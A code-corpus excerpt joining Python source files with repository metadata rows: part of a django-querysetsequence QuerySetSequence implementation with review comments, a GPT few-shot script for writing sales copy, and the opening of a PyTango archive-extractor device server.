            # Find the point when low_mark crosses a threshold.
            for i, offset in enumerate(counts):
                if offset <= low_mark:
                    start_index = i
                if low_mark < offset:
                    break

        # Trim the end of the QuerySets, if necessary.
        end_index = len(self._querysets)
        if high_mark is None:
            # If it was unset (meaning all), set it to the maximum.
            high_mark = counts[-1]
        elif high_mark:
            # Convert a negative index into a positive.
            if high_mark < 0:
                high_mark += counts[-1]

            # Find the point when high_mark crosses a threshold.
            for i, offset in enumerate(counts):
                if high_mark <= offset:
                    end_index = i
                    break

        # Remove QuerySets we don't care about.
        self._querysets = self._querysets[start_index:end_index]
        self._queryset_idxs = self._queryset_idxs[start_index:end_index]

        # The low_mark needs the removed QuerySets subtracted from it.
        low_mark -= counts[start_index]
        # The high_mark needs the count of all QuerySets before it subtracted
        # from it.
        high_mark -= counts[end_index - 1]

        # Apply the offsets to the edge QuerySets (apply the high mark first
        # in-case there's only a single QuerySet left).
        self._querysets[-1] = self._querysets[-1][:high_mark]
        self._querysets[0] = self._querysets[0][low_mark:]

        # For anything left, just iterate through each QuerySet.
        return self._unordered_iterator()
class ModelIterable(BaseIterable):
    """Iterable over model instances; ordering fields are read as attributes."""

    @staticmethod
    def _get_fields(obj, *field_names):
        # Attribute access: one name yields a scalar, several yield a tuple.
        getter = attrgetter(*field_names)
        return getter(obj)

    def _add_queryset_index(self, obj, value):
        # Model instances always carry the QuerySet index, stored under the
        # (non-identifier) attribute name '#'.
        setattr(obj, '#', value)
        return obj
class ValuesIterable(BaseIterable):
    """
    Iterable for ``values()`` results: yields one dict per row.

    ``__init__`` additionally pulls in any fields that are needed only for
    cross-QuerySet ordering; ``__iter__`` strips those extras back out of
    each yielded dict.
    """

    def __init__(self, querysetsequence):
        super().__init__(querysetsequence)
        self._fields = querysetsequence._fields

        # If no fields are specified (or if '#' is explicitly specified) include
        # the QuerySet index.
        self._include_qs_index = not self._fields or '#' in self._fields
        self._remove_fields = False

        # If there are any "order_by" fields which are *not* the fields to be
        # returned, they also need to be captured.
        if self._order_by:
            qss_fields, std_fields = querysetsequence._separate_fields(*self._fields)
            qss_order_fields, std_order_fields = querysetsequence._separate_fields(*self._order_by)
            extra_fields = [f for f in std_order_fields if f.lstrip('-') not in std_fields]
            self._querysets = [qs.values(*std_fields, *extra_fields) for qs in self._querysets]

            # If any additional fields are pulled, they'll need to be removed.
            self._include_qs_index |= bool(qss_order_fields)
            self._remove_fields = bool(extra_fields) or bool(qss_fields)

    def __iter__(self):
        if not self._remove_fields:
            yield from super().__iter__()
            return

        # The extra fields added for ordering need to be removed.
        for it in super().__iter__():
            yield {k: it[k] for k in self._fields}

    @staticmethod
    def _get_fields(obj, *field_names):
        # Ordering fields are read by dict key.
        return itemgetter(*field_names)(obj)

    def _add_queryset_index(self, obj, value):
        if self._include_qs_index:
            obj['#'] = value
        return obj
class ValuesListIterable(BaseIterable):
    """
    Iterable for ``values_list()`` results: yields one tuple per row.

    When ordering is requested, ``__init__`` asks each QuerySet for the
    ordering-only fields as well and rewrites ``_order_by`` into tuple
    indexes (encoded as strings); ``__iter__`` then truncates each row back
    to the originally-requested fields.
    """

    def __init__(self, querysetsequence):
        super().__init__(querysetsequence)
        fields = querysetsequence._fields

        # Only keep the values from fields.
        self._last_field = len(fields)

        # The location of the QuerySet index.
        try:
            self._qs_index = fields.index('#')
        except ValueError:
            self._qs_index = None

        # If there are any "order_by" fields which are *not* the fields to be
        # returned, they also need to be captured.
        if self._order_by:
            # Find any fields which are only used for ordering.
            _, std_fields = querysetsequence._separate_fields(*fields)
            _, std_order_fields = querysetsequence._separate_fields(*self._order_by)
            order_only_fields = [f for f in std_order_fields if f.lstrip('-') not in std_fields]

            # Capture both the fields to return as well as the fields used only
            # for ordering.
            all_fields = std_fields + order_only_fields
            self._querysets = [qs.values_list(*std_fields, *order_only_fields) for qs in self._querysets]

            # If one of the returned fields is the QuerySet index, insert it so
            # that the indexes of the fields after it are correct.
            # NOTE(review): this truthiness test skips the case where '#' is
            # the *first* requested field (index 0), and the concatenation
            # mixes a list with the tuple ('#',) -- both look suspect; verify
            # against the test-suite before relying on this branch.
            if self._qs_index:
                all_fields = all_fields[:self._qs_index] + ('#',) + all_fields[self._qs_index:]

            # Convert the order_by field names into indexes, but encoded as strings.
            #
            # Note that this assumes that the ordering of the values is shallow
            # (i.e. nothing returns a Model instance).
            order_by_indexes = []
            for field in self._order_by:
                field_name = field.lstrip('-')
                if field_name == '#':
                    # If the index is not one of the returned fields, add it as
                    # the last field.
                    # NOTE(review): `not self._qs_index` is also True when
                    # _qs_index == 0 -- presumably should be `is None`; confirm.
                    if not self._qs_index:
                        self._qs_index = len(all_fields)
                    field_index = self._qs_index
                else:
                    field_index = all_fields.index(field_name)

                order_by_indexes.append(
                    ('-' if field[0] == '-' else '') + str(field_index)
                )
            self._order_by = order_by_indexes

    def __iter__(self):
        # If there's no particular ordering, do not rebuild the tuples.
        if not self._order_by:
            yield from super().__iter__()
            return

        # Remove the fields only used for ordering from the result.
        for row in super().__iter__():
            yield row[:self._last_field]

    @staticmethod
    def _get_fields(obj, *field_names):
        # Note that BaseIterable.__iter__ strips '-' before getting here, so all
        # indexes are positive.
        field_indexes = [int(f) for f in field_names]
        return itemgetter(*field_indexes)(obj)

    def _add_queryset_index(self, obj, value):
        # If the QuerySet index needs to be inserted, build a new tuple with it.
        if self._qs_index is None:
            return obj
        return obj[:self._qs_index] + (value, ) + obj[self._qs_index:]
class FlatValuesListIterable(ValuesListIterable):
    """Yields the lone value of each row instead of a one-element tuple."""

    def __iter__(self):
        # Flat mode is only valid for a single field, so every row is a
        # 1-tuple; unwrap it.
        yield from (row[0] for row in super().__iter__())
class NamedValuesListIterable(ValuesListIterable):
    # Rows are produced exactly as by ValuesListIterable; the underlying
    # QuerySets are asked for named rows in ValuesListIterable.__init__
    # (``named=True`` is forwarded there), so no extra handling is needed here.
    pass
class QuerySetSequence:
    """
    Wrapper for multiple QuerySets without the restriction on the identity of
    the base models.

    Mirrors the django.db.models.query.QuerySet API: methods that return a
    QuerySet return a cloned QuerySetSequence instead, and evaluation is
    deferred until iteration (handled by ``_iterable_class``). The special
    pseudo-field '#' refers to a QuerySet's position in the sequence.
    """

    def __init__(self, *args):
        self._set_querysets(args)
        # Some information necessary for properly iterating through a QuerySet.
        self._order_by = []
        self._fields = None
        self._standard_ordering = True
        self._low_mark, self._high_mark = 0, None
        self._iterable_class = ModelIterable
        self._result_cache = None

    def _set_querysets(self, querysets):
        self._querysets = list(querysets)
        # The original ordering of the QuerySets.
        self._queryset_idxs = list(range(len(self._querysets)))

    def _clone(self):
        """Return a copy with cloned QuerySets and the same iteration state."""
        clone = QuerySetSequence(*[qs._clone() for qs in self._querysets])
        clone._queryset_idxs = self._queryset_idxs
        clone._order_by = self._order_by
        clone._fields = self._fields
        clone._standard_ordering = self._standard_ordering
        clone._low_mark = self._low_mark
        clone._high_mark = self._high_mark
        clone._iterable_class = self._iterable_class
        return clone

    def _fetch_all(self):
        # Evaluate once and cache; subsequent len()/iter()/bool() reuse it.
        if self._result_cache is None:
            self._result_cache = list(self._iterable_class(self))

    @property
    def _prefetch_related_lookups(self):
        # A hack for ModelChoiceField, which uses internal APIs from QuerySet.
        # This should be fixed when https://code.djangoproject.com/ticket/29984
        # is fixed.
        #
        # Note that this really just needs to return a truth-y value if any of
        # the QuerySets are using prefetch_related, but this tries to keep the
        # type sane at least.
        result = ()
        for qs in self._querysets:
            result += qs._prefetch_related_lookups
        return result

    # Python magic methods.

    def __len__(self):
        self._fetch_all()
        return len(self._result_cache)

    def __iter__(self):
        self._fetch_all()
        return iter(self._result_cache)

    def __bool__(self):
        self._fetch_all()
        return bool(self._result_cache)

    def __getitem__(self, k):
        """
        Retrieves an item or slice from the set of results.
        """
        if not isinstance(k, (int, slice)):
            raise TypeError
        assert ((not isinstance(k, slice) and (k >= 0)) or
                (isinstance(k, slice) and (k.start is None or k.start >= 0) and
                 (k.stop is None or k.stop >= 0))), \
            "Negative indexing is not supported."

        if isinstance(k, slice):
            qs = self._clone()
            # If start is not given, it is 0.
            if k.start is not None:
                start = int(k.start)
            else:
                start = 0
            # Apply the new start to any previous slices.
            qs._low_mark += start

            # If stop is not given, don't modify the stop.
            if k.stop is not None:
                stop = int(k.stop)

                # The high mark needs to take into an account any previous
                # offsets of the low mark.
                offset = stop - start
                qs._high_mark = qs._low_mark + offset
            return list(qs)[::k.step] if k.step else qs

        qs = self._clone()
        qs._low_mark += k
        qs._high_mark = qs._low_mark + 1
        return list(qs)[0]

    def __and__(self, other):
        # If the other QuerySet is an EmptyQuerySet, this is a no-op.
        if isinstance(other, EmptyQuerySet):
            return other
        combined = self._clone()

        querysets = []
        for qs in combined._querysets:
            # Only QuerySets of the same type can have any overlap.
            if issubclass(qs.model, other.model):
                querysets.append(qs & other)

        # If none are left, we're left with an EmptyQuerySet.
        if not querysets:
            return other.none()

        combined._set_querysets(querysets)
        return combined

    def __or__(self, other):
        # If the other QuerySet is an EmptyQuerySet, this is a no-op.
        if isinstance(other, EmptyQuerySet):
            return self
        combined = self._clone()

        # If the other instance is a QuerySetSequence, combine the QuerySets.
        if isinstance(other, QuerySetSequence):
            combined._set_querysets(self._querysets + other._querysets)
        elif isinstance(other, QuerySet):
            combined._set_querysets(self._querysets + [other])

        return combined

    def _separate_filter_fields(self, **kwargs):
        """Split filter kwargs into '#'-prefixed (sequence-level) and standard."""
        qss_fields, std_fields = self._separate_fields(*kwargs.keys())

        # Remove any fields that start with '#' from kwargs.
        qss_kwargs = {field: value for field, value in kwargs.items() if field in qss_fields}
        std_kwargs = {field: value for field, value in kwargs.items() if field in std_fields}

        return qss_kwargs, std_kwargs

    def _separate_fields(self, *fields):
        # Remove any fields that start with '#' from kwargs.
        qss_fields = []
        std_fields = []
        for field in fields:
            if field.startswith('#') or field.startswith('-#'):
                qss_fields.append(field)
            else:
                std_fields.append(field)

        return qss_fields, std_fields

    def _filter_or_exclude_querysets(self, negate, **kwargs):
        """
        Similar to QuerySet._filter_or_exclude, but run over the QuerySets in
        the QuerySetSequence instead of over each QuerySet's fields.
        """
        # NOTE(review): the lambdas below close over the loop variables
        # ``value``/``operator`` and the resulting filter objects are only
        # consumed after the loop (at the list() call) -- with more than one
        # kwarg this looks like a late-binding hazard; confirm with a
        # multi-kwarg test case.
        # Ensure negate is a boolean.
        negate = bool(negate)

        for kwarg, value in kwargs.items():
            parts = kwarg.split(LOOKUP_SEP)

            # Ensure this is being used to filter QuerySets.
            if parts[0] != '#':
                raise ValueError("Keyword '%s' is not a valid keyword to filter over, "
                                 "it must begin with '#'." % kwarg)

            # Don't allow __ multiple times.
            if len(parts) > 2:
                raise ValueError("Keyword '%s' must not contain multiple "
                                 "lookup separators." % kwarg)

            # The actual lookup is the second part.
            try:
                lookup = parts[1]
            except IndexError:
                lookup = 'exact'

            # Math operators that all have the same logic.
            LOOKUP_TO_OPERATOR = {
                'exact': eq,
                'iexact': eq,
                'gt': gt,
                'gte': ge,
                'lt': lt,
                'lte': le,
            }
            try:
                operator = LOOKUP_TO_OPERATOR[lookup]

                # These expect integers, this matches the logic in
                # IntegerField.get_prep_value(). (Essentially treat the '#'
                # field as an IntegerField.)
                if value is not None:
                    value = int(value)

                self._queryset_idxs = filter(lambda i: operator(i, value) != negate, self._queryset_idxs)
                continue
            except KeyError:
                # It wasn't one of the above operators, keep trying.
                pass

            # Some of these seem to get handled as bytes.
            if lookup in ('contains', 'icontains'):
                value = str(value)
                self._queryset_idxs = filter(lambda i: (value in str(i)) != negate, self._queryset_idxs)

            elif lookup == 'in':
                self._queryset_idxs = filter(lambda i: (i in value) != negate, self._queryset_idxs)

            elif lookup in ('startswith', 'istartswith'):
                value = str(value)
                self._queryset_idxs = filter(lambda i: str(i).startswith(value) != negate, self._queryset_idxs)

            elif lookup in ('endswith', 'iendswith'):
                value = str(value)
                self._queryset_idxs = filter(lambda i: str(i).endswith(value) != negate, self._queryset_idxs)

            elif lookup == 'range':
                # Inclusive include.
                start, end = value
                self._queryset_idxs = filter(lambda i: (start <= i <= end) != negate, self._queryset_idxs)

            else:
                # Any other field lookup is not supported, e.g. date, year, month,
                # day, week_day, hour, minute, second, isnull, search, regex, and
                # iregex.
                raise ValueError("Unsupported lookup '%s'" % lookup)

        # Convert back to a list on Python 3.
        self._queryset_idxs = list(self._queryset_idxs)

        # Finally, keep only the QuerySets we care about!
        self._querysets = [self._querysets[i] for i in self._queryset_idxs]

    # Methods that return new QuerySets

    def filter(self, *args, **kwargs):
        qss_fields, fields = self._separate_filter_fields(**kwargs)

        clone = self._clone()
        clone._filter_or_exclude_querysets(False, **qss_fields)
        clone._querysets = [qs.filter(*args, **fields) for qs in clone._querysets]
        return clone

    def exclude(self, **kwargs):
        qss_fields, fields = self._separate_filter_fields(**kwargs)

        clone = self._clone()
        clone._filter_or_exclude_querysets(True, **qss_fields)
        clone._querysets = [qs.exclude(**fields) for qs in clone._querysets]
        return clone

    def annotate(self, *args, **kwargs):
        clone = self._clone()
        clone._querysets = [qs.annotate(*args, **kwargs) for qs in clone._querysets]
        return clone

    if django.VERSION > (3, 2):
        def alias(self, *args, **kwargs):
            raise NotImplementedError()

    def order_by(self, *fields):
        _, filtered_fields = self._separate_fields(*fields)

        # Apply the filtered fields to each underlying QuerySet.
        clone = self._clone()
        clone._querysets = [qs.order_by(*filtered_fields) for qs in self._querysets]
        # But keep the original fields for the clone.
        clone._order_by = list(fields)
        return clone

    def reverse(self):
        clone = self._clone()
        clone._querysets = [qs.reverse() for qs in reversed(self._querysets)]
        clone._standard_ordering = not self._standard_ordering
        return clone

    def distinct(self, *fields):
        # NOTE(review): the ``fields`` argument is accepted but not forwarded
        # to the underlying QuerySets -- presumably because field-specific
        # DISTINCT cannot be made consistent across models; confirm.
        if len({qs.model for qs in self._querysets}) != len(self._querysets):
            raise NotImplementedError('Multiple QS of same model unsupported')
        clone = self._clone()
        clone._querysets = [qs.distinct() for qs in clone._querysets]
        return clone

    def values(self, *fields, **expressions):
        _, std_fields = self._separate_fields(*fields)
        clone = self._clone()
        clone._querysets = [qs.values(*std_fields, **expressions) for qs in self._querysets]
        clone._fields = list(fields) + list(expressions.keys())
        clone._iterable_class = ValuesIterable
        return clone

    def values_list(self, *fields, flat=False, named=False):
        if flat and named:
            raise TypeError("'flat' and 'named' can't be used together.")
        if flat and len(fields) > 1:
            raise TypeError("'flat' is not valid when values_list is called with more than one field.")

        _, std_fields = self._separate_fields(*fields)
        clone = self._clone()
        # Note that we always process the flat-ness ourself.
        clone._querysets = [qs.values_list(*std_fields, flat=False, named=named) for qs in self._querysets]
        clone._fields = list(fields)
        clone._iterable_class = (
            NamedValuesListIterable if named
            else FlatValuesListIterable if flat
            else ValuesListIterable
        )
        return clone

    def dates(self, field, kind, order='ASC'):
        raise NotImplementedError()

    # Django 3.1 added an additional parameter.
    if django.VERSION < (3, 1):
        def datetimes(self, field_name, kind, order='ASC', tzinfo=None):
            raise NotImplementedError()
    else:
        def datetimes(self, field_name, kind, order='ASC', tzinfo=None, is_dst=None):
            raise NotImplementedError()

    def none(self):
        # This is a bit odd, but use the first QuerySet to properly return an
        # that is an instance of EmptyQuerySet.
        return self._querysets[0].none()

    def all(self):
        clone = self._clone()
        clone._querysets = [qs.all() for qs in self._querysets]
        return clone

    def union(self, *other_qs, **kwargs):
        raise NotImplementedError()

    def intersection(self, *other_qs, **kwargs):
        raise NotImplementedError()

    def difference(self, *other_qs, **kwargs):
        raise NotImplementedError()

    def select_related(self, *fields):
        clone = self._clone()
        clone._querysets = [qs.select_related(*fields) for qs in self._querysets]
        return clone

    def prefetch_related(self, *lookups):
        clone = self._clone()
        clone._querysets = [qs.prefetch_related(*lookups) for qs in self._querysets]
        return clone

    def extra(self, select=None, where=None, params=None, tables=None, order_by=None, select_params=None):
        clone = self._clone()
        clone._querysets = [qs.extra(select=select, where=where, params=params, tables=tables, order_by=order_by, select_params=select_params) for qs in self._querysets]
        return clone

    def defer(self, *fields):
        clone = self._clone()
        clone._querysets = [qs.defer(*fields) for qs in self._querysets]
        return clone

    def only(self, *fields):
        clone = self._clone()
        clone._querysets = [qs.only(*fields) for qs in self._querysets]
        return clone

    def using(self, alias):
        clone = self._clone()
        clone._querysets = [qs.using(alias) for qs in self._querysets]
        return clone

    def select_for_update(self, nowait=False, skip_locked=False, of=(), no_key=False):
        raise NotImplementedError()

    def raw(self, raw_query, params=(), translations=None):
        raise NotImplementedError()

    # Methods that do not return QuerySets

    def get(self, **kwargs):
        clone = self.filter(**kwargs)

        result = None
        for qs in clone._querysets:
            try:
                obj = qs.get()
            except ObjectDoesNotExist:
                pass
            # Don't catch the MultipleObjectsReturned(), allow it to raise.
            else:
                # If a second object is found, raise an exception.
                if result:
                    raise MultipleObjectsReturned()
                result = obj

        # Checked all QuerySets and no object was found.
        if result is None:
            raise ObjectDoesNotExist()

        # Return the only result found.
        return result

    def create(self, **kwargs):
        raise NotImplementedError()

    def get_or_create(self, defaults=None, **kwargs):
        raise NotImplementedError()

    def update_or_create(self, defaults=None, **kwargs):
        raise NotImplementedError()

    def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
        raise NotImplementedError()

    def bulk_update(self, objs, fields, batch_size=None):
        raise NotImplementedError()

    def count(self):
        # NOTE(review): only ``_low_mark`` is accounted for here; a set
        # ``_high_mark`` (from slicing) is ignored, so sliced sequences look
        # like they return more rows than iteration yields -- verify intended.
        return sum(qs.count() for qs in self._querysets) - self._low_mark

    def in_bulk(self, id_list=None, *, field_name='pk'):
        raise NotImplementedError()

    def iterator(self):
        clone = self._clone()
        clone._querysets = [qs.iterator() for qs in self._querysets]
        return clone

    def _get_latest_by(self):
        """Process get_latest_by Meta on each QuerySet and return the value."""
        # Get each QuerySet's get_latest_by (ignore unset values).
        get_latest_by = map(lambda qs: getattr(qs.model._meta, 'get_latest_by'), self._querysets)
        get_latest_by = set(get_latest_by)

        # Ensure all of them are identical.
        if len(get_latest_by) > 1:
            raise ValueError(
                "earliest() and latest() require 'get_latest_by' in each "
                "model's Meta to be identical.")

        # If all the values are None, get_latest_by was not set.
        # NOTE(review): when every model leaves get_latest_by unset the set is
        # ``{None}``, which is truthy, so this branch never fires and [None]
        # is returned as the field list -- confirm against the test-suite.
        if not get_latest_by:
            raise ValueError(
                "earliest() and latest() require either fields as positional "
                "arguments or 'get_latest_by' in the model's Meta.")

        # Cast to a list and return the value.
        return list(get_latest_by)

    def _get_first_or_last(self, items, order_fields, reverse):
        # Generate a comparator and sort the items.
        comparator = self._iterable_class._generate_comparator(order_fields)
        items = sorted(items, key=functools.cmp_to_key(comparator), reverse=reverse)

        # Return the first one (whether this is first or last is controlled by
        # reverse).
        return items[0]

    def latest(self, *fields):
        # If fields are given, fallback to get_latest_by.
        if not fields:
            fields = self._get_latest_by()

        objs = []
        for qs in self._querysets:
            try:
                objs.append(qs.latest(*fields))
            except ObjectDoesNotExist:
                pass

        # Checked all QuerySets and no object was found.
        if not objs:
            raise ObjectDoesNotExist()

        # Return the latest.
        return self._get_first_or_last(objs, fields, True)

    def earliest(self, *fields):
        # If fields are given, fallback to get_latest_by.
        if not fields:
            fields = self._get_latest_by()

        objs = []
        for qs in self._querysets:
            try:
                objs.append(qs.earliest(*fields))
            except ObjectDoesNotExist:
                pass

        # Checked all QuerySets and no object was found.
        if not objs:
            raise ObjectDoesNotExist()

        # Return the latest.
        return self._get_first_or_last(objs, fields, False)

    def first(self):
        # If there's no QuerySets, return None. If the QuerySets are unordered,
        # use the first item of first QuerySet. If ordered, compare the first
        # item of each QuerySet to find the overall first.
        if not self._querysets:
            return None
        elif not self.ordered:
            return self._querysets[0].first()
        else:
            # Get each first item for each and compare them, return the "first".
            return self._get_first_or_last(
                [qs.first() for qs in self._querysets], self._order_by, False)

    def last(self):
        # See the comments for first().
        if not self._querysets:
            return None
        elif not self.ordered:
            return self._querysets[-1].last()
        else:
            # Get each last item for each and compare them, return the "last".
            return self._get_first_or_last(
                [qs.last() for qs in self._querysets], self._order_by, True)

    def aggregate(self, *args, **kwargs):
        raise NotImplementedError()

    def exists(self):
        return any(qs.exists() for qs in self._querysets)

    def update(self, **kwargs):
        # Run every per-QuerySet update inside one transaction so the whole
        # sequence updates atomically.
        with transaction.atomic():
            return sum(qs.update(**kwargs) for qs in self._querysets)

    def delete(self):
        deleted_count = 0
        deleted_objects = defaultdict(int)
        for qs in self._querysets:
            # Delete this QuerySet.
            current_deleted_count, current_deleted_objects = qs.delete()

            # Combine the results.
            deleted_count += current_deleted_count
            for obj, count in current_deleted_objects.items():
                deleted_objects[obj] += count

        return deleted_count, dict(deleted_objects)

    def as_manager(self):
        raise NotImplementedError()

    def explain(self, format=None, **options):
        return '\n'.join(qs.explain(format=format, **options) for qs in self._querysets)

    # Public attributes

    @property
    def ordered(self):
        """
        Returns True if the QuerySet is ordered -- i.e. has an order_by()
        clause.
        """
        return bool(self._order_by)

    # Methods specific to QuerySetSequence.

    def get_querysets(self):
        """Returns a list of the QuerySet objects which form the sequence."""
        return self._querysets
| 36.470646 | 169 | 0.602742 |
1846d30be846a869f2df44ce5ae63d8ee1d2c30d | 1,272 | py | Python | examples/Sales_Copy/run_sales_copy.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_sales_copy.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_sales_copy.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | ##updated api path, engine, top p
##Runs as expected
import os
import sys
API_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
sys.path.append(API_PATH)
from api import GPT, Example, UIConfig
# Construct GPT object and show some examples
gpt = GPT(engine="curie-instruct-beta",
temperature=0.7,
top_p=1,
max_tokens=100)
#Create a high converting sales copy for websites
gpt.add_example(Example("""Buffer, Social Media management platform""",
"""“Tell your brand’s story and grow your audience with a publishing, analytics, and engagement platform you can trust."""))
gpt.add_example(Example("""WK Leads, Lead generation software to find qualified leads in your market.""",
"""“Get direct access to decision makers from 30M+ companies in less than 5 minutes with WK Leads."""))
gpt.add_example(Example("""Tye, An AI helping users make more creative sales copy""",
"""“A chatbot that helps you create better, more engaging sales pages and email campaigns in minutes."""))
# Define UI configuration
config = UIConfig(description="Create high converting sales copy for your website.",
button_text="Create",
placeholder="Product, Product description")
id = "sales_copy" | 34.378378 | 124 | 0.712264 |
35383c77a80aeedb98a2316547a2611154750065 | 21,613 | py | Python | PyTangoArchiving/servers/PyExtractor/PyExtractor.py | MaxIV-KitsControls/PyTangoArchiving | 28852dd5fc2c53d19dad8b654584f5d9408e5a7c | [
"CC-BY-3.0"
] | 1 | 2019-09-20T08:11:04.000Z | 2019-09-20T08:11:04.000Z | PyTangoArchiving/servers/PyExtractor/PyExtractor.py | MaxIV-KitsControls/PyTangoArchiving | 28852dd5fc2c53d19dad8b654584f5d9408e5a7c | [
"CC-BY-3.0"
] | null | null | null | PyTangoArchiving/servers/PyExtractor/PyExtractor.py | MaxIV-KitsControls/PyTangoArchiving | 28852dd5fc2c53d19dad8b654584f5d9408e5a7c | [
"CC-BY-3.0"
] | null | null | null | # "$Name: $";
# "$Header: $";
#=============================================================================
#
# file : PyExtractor.py
#
# description : Python source for the PyExtractor and its commands.
# The class is derived from Device. It represents the
# CORBA servant object which will be accessed from the
# network. All commands which can be executed on the
# PyExtractor are implemented in this file.
#
# project : TANGO Device Server
#
# $Author: $
#
# $Revision: $
#
# $Log: $
#
# copyleft : European Synchrotron Radiation Facility
# BP 220, Grenoble 38043
# FRANCE
#
#=============================================================================
# This file is generated by POGO
# (Program Obviously used to Generate tango Object)
#
# (c) - Software Engineering Group - ESRF
#=============================================================================
#
import PyTango
import sys,time
import fandango
import fandango.functional as fn
import fandango.tango as ft
import PyTangoArchiving
import traceback
from fandango.objects import Cached
def decimate_values(values,N=1024,method=None):
    """Decimate a time-sorted sequence of (time, ...) tuples into ~N buckets.

    The overall time span is divided into N equal intervals. Without a
    ``method``, the first sample reaching each interval boundary is kept and
    the final sample is always appended. With a ``method``, it is applied to
    the buffered window of samples to pick each kept value; the window is
    re-seeded with the value just kept (and note the last raw sample is NOT
    force-appended in this branch — preserved from the original behaviour).
    """
    t_lo, t_hi = sorted((values[0][0], values[-1][0]))
    step = float(t_hi - t_lo) / N
    kept = [values[0]]
    window = [values[0]]
    if method is None:
        for sample in values[:-1]:
            if sample[0] >= (step + float(kept[-1][0])):
                kept.append(sample)
        kept.append(values[-1])
    else:
        for sample in values:
            if sample[0] >= (step + float(kept[-1][0])):
                kept.append(method(window))
                window = [kept[-1]]
            window.append(sample)
    return kept
class PyExtractor(PyTango.Device_4Impl):
    """Tango device serving archived attribute data on demand (Python 2).

    GetAttDataBetweenDates() schedules an asynchronous read through a
    PyTangoArchiving ReaderProcess; reader_hook() later publishes the result
    as a family of dynamic attributes for one archived attribute <attr>:
    <attr> (time/value table), <attr>_r (values), <attr>_t (epochs),
    <attr>_d (date strings), <attr>_l (last value), <attr>_ld (last date).
    Extracted data is cached in self.AttrData until it expires.
    """
    #--------- Add you global variables here --------------------------
    @staticmethod
    def dates2times(argin):
        """
        Parsing dates like 'Y-M-D h:m' or '+/-X(shmdw)'
        """
        return [fn.time2str(fn.str2time(a)) for a in argin]
    @staticmethod
    def bool2float(argin):
        # False-like inputs ('false', '0', '', None, ...) become 0.0, else 1.0.
        return float(not fn.isFalse(argin))
    @staticmethod
    def tag2attr(argin):
        # Map a dynamic-attribute tag back to the archived attribute name:
        # strip any view suffix and restore '/' separators from '__'.
        if any(argin.endswith(s) for s in ('_r','_t','_w','_d','_l','_ld')):
            argin = argin.rsplit('_',1)[0]
        if '/' not in argin: argin = argin.replace('__','/')
        return argin
    @staticmethod
    def attr2tag(argin):
        # Map an attribute name to a Tango-legal tag name ('/' -> '__').
        if '/' in argin: argin = argin.replace('/','__')
        return argin
    def read_dyn_attr(self,attr):
        """Serve a read on any dynamic attribute created by reader_hook().

        The returned view depends on the attribute-name suffix (see class
        docstring); data comes from the self.AttrData cache, converted with
        bool2float/float/str according to the cached Tango type.
        """
        try:
            #attr.set_value(1.0)
            aname,values = attr.get_name(),[]
            attribute = self.tag2attr(aname)
            print time.ctime()+'In read_dyn_attr(%s)'%aname
            print(self.counter)
            try:
                # Cache entry layout: (request_time, attr_format, attr_type, data)
                req,atformat,attype,data = self.AttrData[attribute]
            except Exception,e:
                print('Unable to read %s: key = %s ; cache = %s' % (attr,attribute,self.AttrData.keys()))
                traceback.print_exc()
                raise e
            conv = self.bool2float if attype is PyTango.DevBoolean \
                else (float if attype is PyTango.DevDouble
                    else str)
            if aname.endswith('_r'):
                # Read values only; v = (time, read_value[, write_value]).
                if atformat is PyTango.SpectrumAttr:
                    values = [conv(v[1] or 0.) for v in data]
                else:
                    values = [map(conv,v[1]) for v in data]
                if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
                else: print '\tno values'
                attr.set_value(values,len(values))
            elif aname.endswith('_l'):
                # Last value only; INVALID quality when the cache is empty.
                print('%s: %s' % (aname,data))
                if data[-1:]:
                    value = conv(data[-1][1])
                    date = float(data[-1][0] or 0.)
                    q = ft.AttrQuality.ATTR_VALID
                else:
                    value = None
                    date = fn.now()
                    q = ft.AttrQuality.ATTR_INVALID
                print( time.ctime()+'In read_dyn_attr(%s): (%s,%s,%s)'
                    % ( aname, value, date, q ) )
                attr.set_value_date_quality((value or 0.),date,q)
            elif aname.endswith('_w'):
                # Write values (third element of each sample tuple).
                if atformat is PyTango.SpectrumAttr:
                    values = [conv(v[2] or 0.) for v in data]
                else:
                    values = [map(conv,v[2]) for v in data]
                if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
                else: print '\tno values'
                attr.set_value(values,len(values))
            elif aname.endswith('_t'):
                # Timestamps as float epochs.
                values = [float(v[0] or 0.) for v in data]
                if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
                else: print '\tno values'
                attr.set_value(values,len(values))
            elif aname.endswith('_d'):
                # Timestamps formatted as human-readable date strings.
                values = [fn.time2str(float(v[0] or 0.)) for v in data]
                if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
                else: print '\tno values'
                attr.set_value(values,len(values))
            elif aname.endswith('_ld'):
                # Date string of the most recent sample only.
                lv = [fn.time2str(float(v[0] or 0.)) for v in data[-1:]]
                if lv:
                    print(time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'
                        %(aname,type(lv[0]),len(lv),lv[0],lv[-1]))
                else: print '\tno values'
                attr.set_value(lv[-1])
            else:
                # No suffix: full (time, value[, ...]) table for the attribute.
                if atformat == PyTango.SpectrumAttr:
                    if attype == PyTango.DevString:
                        values = [(fn.time2str(d[0]),str(d[1])) for d in data]
                    else:
                        values = [(d[0],conv(d[1])) for d in data]
                else:
                    if attype is PyTango.DevString:
                        values = [[fn.time2str(d[0])]+map(str,d[1]) for d in data]
                    else:
                        values = [[d[0]]+map(conv,d[1]) for d in data]
                if values:
                    print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
                else:
                    print '\tno values'
                attr.set_value(values,len(values))
                print '\treturned %d values'%len(values)
        except Exception as e:
            traceback.print_exc()
            raise e
    def is_dyn_attr_allowed(self,attr,req_type=None):
